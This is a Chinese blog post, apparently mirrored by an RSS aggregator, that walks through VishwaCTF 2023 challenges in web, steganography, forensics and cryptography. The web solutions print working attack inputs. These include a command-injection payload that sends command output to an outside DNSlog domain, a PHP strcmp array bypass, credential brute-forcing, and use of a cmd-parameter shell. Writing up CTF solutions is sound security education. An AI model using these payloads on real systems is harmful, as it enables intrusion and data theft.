惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

C
CXSECURITY Database RSS Feed - CXSecurity.com
S
Schneier on Security
N
News and Events Feed by Topic
量子位
S
Secure Thoughts
V2EX - 技术
V2EX - 技术
Hugging Face - Blog
Hugging Face - Blog
S
Security Affairs
J
Java Code Geeks
Schneier on Security
Schneier on Security
Google Online Security Blog
Google Online Security Blog
TaoSecurity Blog
TaoSecurity Blog
小众软件
小众软件
S
SegmentFault 最新的问题
www.infosecurity-magazine.com
www.infosecurity-magazine.com
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
Security Archives - TechRepublic
Security Archives - TechRepublic
P
Privacy International News Feed
酷 壳 – CoolShell
酷 壳 – CoolShell
美团技术团队
博客园 - 聂微东
T
Tor Project blog
博客园 - Franky
C
CERT Recently Published Vulnerability Notes
Cyberwarzone
Cyberwarzone
罗磊的独立博客
博客园_首页
The Cloudflare Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
博客园 - 三生石上(FineUI控件)
大猫的无限游戏
大猫的无限游戏
Forbes - Security
Forbes - Security
V
Vulnerabilities – Threatpost
Security Latest
Security Latest
腾讯CDC
Simon Willison's Weblog
Simon Willison's Weblog
S
Securelist
博客园 - 【当耐特】
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Threat Research - Cisco Blogs
博客园 - 司徒正美
AWS News Blog
AWS News Blog
WordPress大学
WordPress大学
Jina AI
Jina AI
G
GRAHAM CLULEY
V
V2EX
L
LINUX DO - 最新话题
H
Heimdal Security Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
IT之家
IT之家

Hi, I Am I

[I Am I 年度简报] — 不知终日梦为鱼 初探 ESP32-CAM QQ 聊天记录 MHT 文件转 HTML [I Am I 年度简报] - 草木本无意,荣枯自有时。 Hexo 中实现 Live Photos 支持 写在当下 NKCTF 2024 1z_F0r3ns1c5 Writeup 春秋杯冬季赛 2023 Writeup [I Am I 年度简报] - 2023 某内网渗透内部赛 Writeup 强网拟态 2023 Writeup Github Actions 自动化部署 Hexo 浅析CobaltStrike流量解密 陇剑杯 2023 Writeup CTF线下赛AWDP总结 ISCC 2023 Writeup ISCC 2023 实战题 Writeup CISCN 2023 Writeup 福建闽盾杯网络空间安全大赛 2023 Writeup 天一永安杯宁波市网络安全大赛 2023 Writeup 贵阳大数据及网络安全精英对抗赛 2023 Writeup 红明谷杯 2023 Writeup Confetti 带来有仪式感的鼓励 记一次 JS 逆向密码加密 [I Am I 年度简报] – 2022 PHP 读取 Excel 文件内容并写入数据库 从0开始的 MoeCTF 开发之路 观安杯 2022 Writeup 利用微信服务号实现早安自动化 Cloudflare批量拉黑IP脚本 蓝帽杯 2022 Writeup 为你的网站添加 Do you like me 小组件 ISCC 2022 Writeup CISCN 2022 Writeup ISCC 2022 实战题 Writeup CTF线下赛AWD攻防总结 [I Am I 年度简报] – 2021 记一次 CNVD 通用型漏洞证书挖掘 Google Adsense 收款流程 使用 Digispark 开发板制作 BadUSB 在 Vue 中使用 Axios 获取钉钉群直播回放的 M3U8 地址 Flask 框架学习记录 关于 Ten·API 防火墙的配置 关于最近 关于 Burp Suite 调教这档事 ISCC 2021 Writeup 记一次 CTF 环境和动态独立靶机部署 各大平台图集解析思路 情话总雷同,恨意千万种 HackThisSite Basic Writeup [I Am I 年度简报] - 2020 Kali 设置中文语言和更换镜像源 使用 Python 下载哔哩哔哩视频 PHP使用 CURL 发送网络请求 PHP蓝奏云直链解析源码 从0开始写一个短视频去水印接口 Windows+Ubuntu 双系统之美化 GRUB Windows+Ubuntu 双系统安装 树莓派安装 Aria2 实现24小时不间断的下载机 抖音无水印解析最新PHP源码 API-Admin Ten·API管理后台 树莓派安装 DLNA 实现流媒体服务器 [I Am I 年度简报] - 2019 Hello Hexo Goindex 将 Google Drive 打造成网盘 自用博客评论邮件通知美化模板 使用 IFTTT 长久保留 Google Voice 号码 Telegram MTProxy 代理一键安装脚本 三分钟学会搭建我的世界基岩版服务器 PHP跳转QQ聊天窗口源码 推荐几款开源HTML5(Web)框架 谷歌新出浏览器 Chromium 可以直接翻墙 Live2D!为你的网站添加看板娘 为你的网站添加Gittalk评论 网站数据离奇丢失...... Lsky Pro(兰空图床)—又一款单纯的图床程序 LOL明天解封ヾ(◍°∇°◍)ノ゙ 唔~本站受到DDOS攻击 [I Am I 年度简报] – 2018 死肥宅也要谈恋爱之早安晚安自动化 1024,Hello,world! 宝塔面板 Bt.cn 专业版破解教程 Uptime >>16 years 震惊!坐在家里竟然可以日入百万 免费获取一年的 .ooo 域名 PHP 调用 新浪API 生成短网址 思杰马克丁成 Adobe 中国授权经销商 畅言商业广告上线-去除畅言评论广告 使用网易云音乐官方接口解析VIP音乐 PHP获取QQ昵称和头像API 坦白说查发送人QQ新方法(已失效) 日常水一波 通过微博图片地址溯源上传者 WordPress 评论夜间自动改为必须审核 十步叫你如何无损修复硬盘锁(mbr病毒) [I Am I 年度简报] – 2017 密码破解与心理学 网页屏蔽各种按键的代码分享 网络安全技术专业术语
VishwaCTF 2023 Writeup
2023-04-03 · via Hi, I Am I

写在前面

怎么说呢… 感觉这比赛有些许神经质…套路确实不同于以前打的CTF

Web

spooky

I forgot my login credentials again!!

目录扫描发现存在 /sitemap.xml 文件,访问后给出了用户名列表和密码列表

<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url>
	<loc>/creds/users.txt</loc>
	<lastmod>2023-03-29T09:12:48+01:00</lastmod>
	<priority>1.0</priority>
</url>
<url>
	<loc>/creds/pass.txt</loc>
	<lastmod>2023-03-29T09:12:48+01:00</lastmod>
	<priority>1.0</priority>
</url>
</urlset>

直接使用 Burp 爆破得到正确的账号密码

user=shrekop
pass=VmU5gnXKYN2vLp48

这题比较神经质,一开始以为爆出来正确的账号密码就行了,后来才发现貌似需要想办法提升到管理员用户,想了很久最后在登录的时候添加 &admin=true 得到 flag

Mascot

Very gracious host!!

目录扫描发发现存在 .git 泄露,使用 GitHack 进行利用发现脱不下来,但是返回的文件名内有个 FLAGGGGG.md 直接访问得到 flag

aLive

In my college level project I created this website that tells us if any domain/ip is active or not. But there is a catch.

通过 Dnslog 进行测试发现可以 RCE,可能是国外比赛的问题,使用国内Dnslog平台无法接收到数据

POST / HTTP/2
Host: ch431021116114.ch.eng.run
Content-Length: 37
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://ch431021116114.ch.eng.run
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ch431021116114.ch.eng.run/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

domain=`whoami`.a23b2268.ipv6.1433.eu.org

经过测试发现过滤了 cat ,我们直接 tac 绕过 得到 flag

domain=`tac f*`.a23b2268.ipv6.1433.eu.org

Eeezzy

I forgot my login details again!

查看网页源代码发现有个 view.php

<?php

    session_start();
    $_SESSION['status']=null;

    $flag="";
    try {
        if (isset($_GET['username']) && isset($_GET['password'])) {
            if (strcmp($_GET['username'], $flag)==0 && strcmp($_GET['password'], $flag)==0)
                $_SESSION['status']=$flag;
            else
                $_SESSION['status']="Invalid username or password";
        }
    } catch (Throwable $th) {
        $_SESSION['status']=$flag;
    }

?>

直接数组绕过,注意一点,不能 usernamepassword 均为数组,否则结果不为 true 会进入 else 语句

?username=admin&password[]=

Payload

访问 robots.txt 提到了 cmdbtn

<?php
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
    else {
        if(isset($_GET['btn'])){
            echo "<b>System Details: </b>";
            system("uname -a");
        }
    }
?>

当点击页面上的系统详细信息按钮时,在 url 中出现 /?btn=,直接 btn 改为 cmd 命令执行即可,注意和前面一样貌似过滤了 cat 直接 tac 命令即可。

Steganography

Can you see me?

A magician made the seven wonders disappear. But people claim they can still feel their presence in the air.

下载附件得到一张图片,在文件尾发现存在隐藏文件,直接使用 foremost 分离得到一个 wav 音频文件,听起来像噪音…直接尝试使用 Audacity 显示为频谱图得到 flag

vishwaCTF{n0w_y0u_533_m3}

image-20230403104342968

Guatemala

My friend wanted to install an antivirus for his computer, but the creator of the antivirus was caught!

下载附件发现无后缀,观察文件头发现是 GIF,改后缀后未发现特别信息,通过 exiftool 发现一段 Base64 编码

> .\exiftool.exe D:\Downloads\Guatemala\AV
ExifTool Version Number         : 12.22
File Name                       : AV.gif
Directory                       : D:/Downloads/Guatemala
File Size                       : 1086 KiB
File Modification Date/Time     : 2023:04:02 14:56:24+08:00
File Access Date/Time           : 2023:04:03 10:39:47+08:00
File Creation Date/Time         : 2023:04:02 14:55:58+08:00
File Permissions                : -rw-rw-rw-
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 498
Image Height                    : 498
Has Color Map                   : Yes
Color Resolution Depth          : 8
Bits Per Pixel                  : 8
Background Color                : 0
Animation Iterations            : Infinite
Comment                         : dmlzaHdhQ1RGe3ByMDczYzdfdXJfM1gxRn0=
Frame Count                     : 17
Duration                        : 2.04 s
Image Size                      : 498x498
Megapixels                      : 0.248

解码 Comment 后得到 flag

vishwaCTF{pr073c7_ur_3X1F}

Just Files

They are not what you see. They are different. Believe me.

下载附件后得到两张图片,分别是 Get_It_1.jpegGet_It_2.png,其中 Get_It_2.png 很大,直接使用 foremost 分离得到 Its_a_Morse_not_a_joke_take_it_seriously.wav 文件,前面很清楚是摩斯电码,后面很嘈杂听不懂,尝试识别莫斯电码后得到如下文本

Reverse the audio and you should find name of protagonist. I told you the story in PNG file.

根据描述我们使用 PR 进行倒放音频,貌似是一个剧中的原声,不过本人英语听力不行… 使用在线音频转文本工具得到如下信息(用于没充会员可能不完整),搜索发现对话片段来自路西法(2016)

She humiliated me. She oh me you're not god's Jimmy. You didn't make her you a destroyer so I'm gonna punish you if that got you freak. I mean I am not going to jail for that bitch. No chance listen into a lucifer back off told you its fine. I'm a move tool.
Why did you do that? He was gonna kill you. No, no, no, no you just. You just let him off too easy and needs the pain he needs to suffer he to feel the pain, not escape it.
Don't worry, I'm sure he's going the pain coming. No, it's not, actually.
The.

所以说主角的名字是 lucifer 但是提交不正确,尝试 Steghide 解密 Its_a_Morse_not_a_joke_take_it_seriously.wav

┌──(kali㉿kali)-[~/Desktop/_Get_It_2.png.extracted]
└─$ steghide extract -sf Its_a_Morse_not_a_joke_take_it_seriously.wav 
Enter passphrase: 
wrote extracted data to "flag.txt".

打开 flag.txt 得到 flag

Nice 
The flag is {the name of protagonist_S01E03}.

name of protagonist should be in small case.

I Love You

There is an audio file given below… It is not so difficult but you will find it’s sound very deep

根据题目描述使用 DeepSound 得到 welcome.exe

image-20230403115651428

根据图标发现 welcome.exe 很明显是 python 打包的文件,直接使用 pyinstxtractor 进行反编译

python pyinstxtractor.py .\welcome.exe

然后再通过在线工具反编译 pyc 文件得到源代码和 flag

print('Hey Cyber Warrior!!!')
print('I hope you have enjoyed whole journey..')
print('You know me .. Who I am ....')
print('ONLY CAPITAL CASES ARE ALLOWED AND _ BETWEEN TWO WORD')
for i in range(0, 4):
    key = input('Enter my last message for my daughter ---->')
    ans = 'I_LOVE_YOU_3000'
    if ans == key:
        print('Nice !!!!. You have got me.')
        print("Flag format ---> vishwaCTF{My Bestfriend's Name_First Apperance year}")
        c = input('Bye....meet you in 2023')
        break
        continue
    print("Wrong !!! you don't know me..")

Forensics

The Sender Conundrum

Marcus Got a Mysterious mail promising a flag if he could crack the password to the file.

得到一个加密压缩包 unzipme.zipTheEmail.eml,直接使用记事本打开邮件原文 TheEmail.eml 得到关键信息

Hello this is u but from future

I am a noun and not a verb or an adverb. I am given to you at birth and never taken away, You keep me until you die, come what may. What am I?

问了一下 ChatGPT 他说答案是 Name,但是尝试了一下密码不对,直接尝试爆破,尝试了很多字典,最后通过 rockyou.txt 爆破出了正确密码 BrandonLee

image-20230403110153940

解压后得到 flag

vishwaCTF{1d3n7i7y_7h3f7_is_n0t_4_j0k3}

1nj3ct0r

You Are Working As Digital Forensics Expert At Infosys India And Someone Reported That A PC Might Have Been Infected. Tech Team Already Collected All The Evidences From Workstation And Found That Someone Injected Malicious Code. It Is Your Job To Find, what Is Injected Into That PC.

NOTE:Use Underscore(_) After Every Word.

wireshark 打开附件发现是 USB 流量,我们通过 tshark 导出所有长度为 2 和内容不为空的流量

./tshark.exe -r usbforensics.pcapng -2 -R "usb.data_len==2 && usb.capdata!=0000" -T fields -e usb.capdata >usbdata.txt

得到所有的按键流量

00:09
00:0f
00:04
00:0a
20:33
20:2f
00:11
00:27
00:1a
20:2d
00:1c
00:27
00:18
20:2d
00:21
00:1f
00:20
20:2d
00:07
00:27
00:11
00:20
20:2d
00:1a
00:1e
00:24
00:0b
20:2d
00:18
00:22
00:25
20:2d
00:09
00:27
00:1f
00:20
00:11
00:22
00:1e
00:06
00:22
20:30

直接脚本解密得到 flag

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

usb_data = open('usbdata.txt')

for line in usb_data:
    key = line.split(":")[1]
    key = key.strip()
    if key in normalKeys:
        print(normalKeys[key], end="")
# flag;[n0w-y0u-423-d0n3-w17h-u58-f023n51c5]

Cryptography

The Indecipherable Cipher

Our crypto specialist Mr.Kasiski is currently unavailable, so help us decode this string.

String: j3qrh4kgz3iptmyqxcw0zkm8i5xugs5lwl0lrwvirwktlqinexcw0zkmq5nqvpebpor5wqipqhw2ikzm4ipktzlr

一开始用 cyberchef 没出来,接着用 cipher-identifier 猜测以下什么编码

image-20230403111032949

试了一下 Base32 未果,尝试 维吉尼亚密码 发现可行,因为密文中存在数字,所以密码表需要手动加上 0-9

VishwaCTF{friedrichwilhelmkasiskiwastheonewhodesignedtheaaakasiskiexaminationtodecodevignerecipher}

image-20230403110655113